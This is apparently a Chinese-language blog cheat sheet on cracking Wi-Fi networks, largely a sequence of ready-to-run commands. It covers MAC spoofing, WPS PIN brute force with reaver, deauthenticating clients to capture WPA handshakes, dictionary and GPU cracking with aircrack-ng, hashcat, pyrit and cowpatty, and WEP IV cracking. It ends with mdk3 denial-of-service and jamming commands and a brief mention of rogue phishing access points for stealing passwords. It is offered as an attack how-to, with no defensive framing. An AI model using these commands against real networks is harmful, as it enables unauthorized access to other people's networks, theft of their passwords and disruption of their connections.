网卡模式
无线网卡开启监听模式
1 2 3 4 5 6 7 8 9 10 11 12 13 14
| ifconfig wlan0 down iwconfig wlan0 mode monitor ifconfig wlan0 up
airmon-ng start wlan0 => wlan0mon
airmon-ng check kill airmon-ng start wlan0
ifconfig eth0 promisc ifconfig eth0 -promisc
|
从监听模式中恢复
1 2 3
| ifconfig wlan0 down iwconfig wlan0 mode managed ifconfig wlan0 up
|
重启网卡
1 2 3 4
| service network-manager restart /etc/init.d/network-manager restart sudo systemctl restart NetworkManager service networking restart
|
保护措施
1 2 3 4 5 6 7 8 9 10 11
| macchanger -s [网卡] macchanger -m 想伪造的MAC地址 网卡 macchanger -A wlan0
vi /etc/hostname
echo 1 >/proc/sys/net/ipv4/icmp_echo_ignore_all
|
拓展坞飞利浦macbook type-c扩展坞 八合一京东https://item.m.jd.com/product/41639596994.html?wxa_abtest=a&gx=RnFlkTRQPmGKydRP--txW6oz50_h_tjGa2Z0&ad_od=share&utm_source=androidapp&utm_medium=appshare&utm_campaign=t_335139774&utm_term=Wxfriends八合一2993
Wifi破解
WPS破解(Pin码)
1、无线网卡开启监听模式
2、扫描开启wps功能的无线AP
这里需要强调一下,网上很多教程里都有-C这个优化参数,当初写这篇博文的时候也有这个参数,不过新版本的wash已经不再支持,感谢Demon先生的友情提醒。
3、破解ping码
1 2 3 4 5
| reaver -i 混杂网卡名 -c 信道 -b AP'MAC -a -S -vv -d 9 -t 9 (混杂模式使用)
目标信号很好: reaver -i wlan0 -b MAC -a -S -vv -d0 -c 1 目标信号普通: reaver -i wlan0 -b MAC -a -S -vv -d2 -t 5 -c 1 目标信号一般: reaver -i wlan0 -b MAC -a -S -vv -d5 -c 1
|
4、成功破解出PIN码后,通过PIN码直接获取路由器密码
1
| reaver -i 混杂网卡名 -b MAC -p PIN码
|
密码字典爆破
WPA/WPA2
Aircrack-ng
1、无线网卡开启混杂监听模式
2、扫描WiFi网络
3、启动监听等待抓取握手包
1 2 3 4
| airodump-ng -c 信道 -w 保存的数据包名 [–-bssid AP’MAC] wlan0mon
airodump-ng -c 6 --bssid 69:71:5E:51:38:EE -w /home/ssooking/wifi/FAST_33687 wlan0mon
|
4、解除客户端认证抓取握手包
1 2 3 4 5 6 7 8 9 10 11
| aireplay-ng -0 攻击次数 -a AP’MAC [-c 客户端MAC] [-e bssid] wlan0mon [--ignore-negative-one
aireplay-ng -0 10 -a 69:71:5E:51:38:EE -c 78:AF:8E:7D:8A:9D wlan0mon
aireplay-ng -0 10 -a 69:71:5E:51:38:EE -c 78:AF:8E:7D:8A:9D wlan0mon --ignore-negative-one
aireplay-ng --fakeauth -q 10 -a AP'MAC -h 模拟用户的MAC aireplay-ng --arpreplay -b AP'MAC -h 模拟用户的MACs
|
5、使用aircrack-ng加载字典破解密码
1 2 3 4 5 6
| aircrack-ng 数据包名.cap –w 字典路径 airdecap-ng -l -e bssid –p 密码数据包名.cap
wpaclean out.cap in.cap //整理包文件内容,保证它的格式内容与密码破解程序兼容 aircrack-ng out.cap -J out.hccap //要把cap数据包转换成hccap数据包才能用oclHashcat破解 cudaHashcat-plus64.exe -m 2500 out.hccap //破解WPAv2哈希
|
数据包处理
1 2 3 4 5 6 7 8 9 10 11 12 13
| airgraph-ng -i filename.csv -g CAPR -o outputfilename.png eog outputfilename.png airgraph-ng -i filename.csv -g CPG -o outputfilename.png eog outputfilename.png
airdecap-ng -b (vic ap) outputfilename.cap wireshark outputfilename.cap airdecap-ng -w (WEP KEY) (capturefile.cap) wireshark capturefile-DEC.cap airdecap-ng -e (ESSID VIC) -p (WPA PASSWORD) (capturefile.cap) wireshark capturefile-dec.cap
|
WEP
1、无线网卡开启混杂监听模式
2、扫描WiFi网络
3、启动监听等待抓取ivs数据包
1 2 3 4
| airodump-ng -c 信道 -w 保存的数据包名 [–-bssid AP’MAC] --ivs wlan0mon
airodump-ng -c 6 --bssid 69:71:5E:51:38:EE -w /home/ssooking/wifi/FAST_33687 wlan0mon
|
4、解除客户端认证抓取ivs数据包
1
| aireplay-ng -3 -b AP’MAC -h 客户端MAC [-x 1024(每秒发包数量)] wlan0mon0
|
注意:为了便于破解密码,所需的ivs数量建议20000以上
5、使用aircrack-ng加载字典破解密码
1 2
| aircrack-ng 数据包名.ivs –w 字典路径 aircrack-ng -x -f 2 包名.ivs -x 暴力破解
|
1 2 3 4 5 6 7 8 9 10
| airdecap-ng –w 解密前的秘钥 数据包名.ivs 如:KEY FOUND! [31:32:33:34:35:36:37:38:39:30:61:61:61] (ASCII:1234560aaa) //蓝色部分是解密前的密钥
wesside –v AP’MAC –k 1(重发数据包次数) –i mon0 //aircrack-ng套件中的自动化破解weo加密wifi工具,但成功率较低 tkiptun-ng –a AP’MAC -h 客户端MAC 网卡 //aircrack-ng套件中的自动化破解wpa/wpa2加密wifi的工具(可加参数:-m 最小数据包长度 -n 最大数据包长度)
辅助命令 airdecloack-ng --bssid AP’MAC --filters signal –i 包名.cap ivstools --convert a.cap b.ivs //将cap数据包转换成ivs数据包 ivstools --merge a.ivs b.ivs ab.ivs //将数据包过滤合并
|
其他破解工具
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
| 握手包破解命令 john --wordlist=password.lst --rules --stdout | aircrack-ng -e essid -w - xxx.cap 使用john在字典上执行排列匹配,将各种组合词提供给aircrack-ng破解使用
pyrit -r xxx.cap -i password.lst attack_passthrough GPU加速破解 (time 程序/命令名
cowpatty -s ESSID -r xxx.cap -d /path/彩虹表路径 (若SSID中包含空格,要用引号)
为cowpatty破解制作专用hash tables : genpmk -f 字典 -d 要生成的hash table -s ssid 很多组织都自己建立了wpa table库,也就是预先使用常见的essid生成hash table 如果要破解essid相同的无线密码,直接网上下载,无需自己再生成 国内比较有名的就是ZerOne团队针对国内常见essid生成的hash table
现在有很多调用aircrack-ng套件自动化抓包破解的项目,可以去github上瞧瞧。
|
在线破解握手包的站点 https://gpuhash.me/
wifite
wifite是一个命令行自动化WiFi破解工具,它会根据目标路由器,自动选择合适的破解方式,比如PIN码破解,抓包暴力破解等。
1、无线网卡开启监听模式
2、启动wifite
钓鱼欺骗获取密码
通过构建钓鱼WiFi,攻击正常客户端迫使其下线,连接恶意AP,欺骗目标用户舒服密码。
WiFi DOS
1 2 3 4 5
| aireplay-ng -0 3 –a BSSID –c clientMAC wlan0 mdk3 mon0 a –a AP'MAC -s 80 mdk3 mon0 d -c 信道 #攻击client MAC mdk3 mon0 b –g –c 11 –h 7 #发动虚假AP信号进行干扰 mdk3 mon0 b –n ESSID –g –c 11 #对指定名称(ESSID)发送干扰,-g是伪装为54M的标准的802.11无线网络,-c频道
|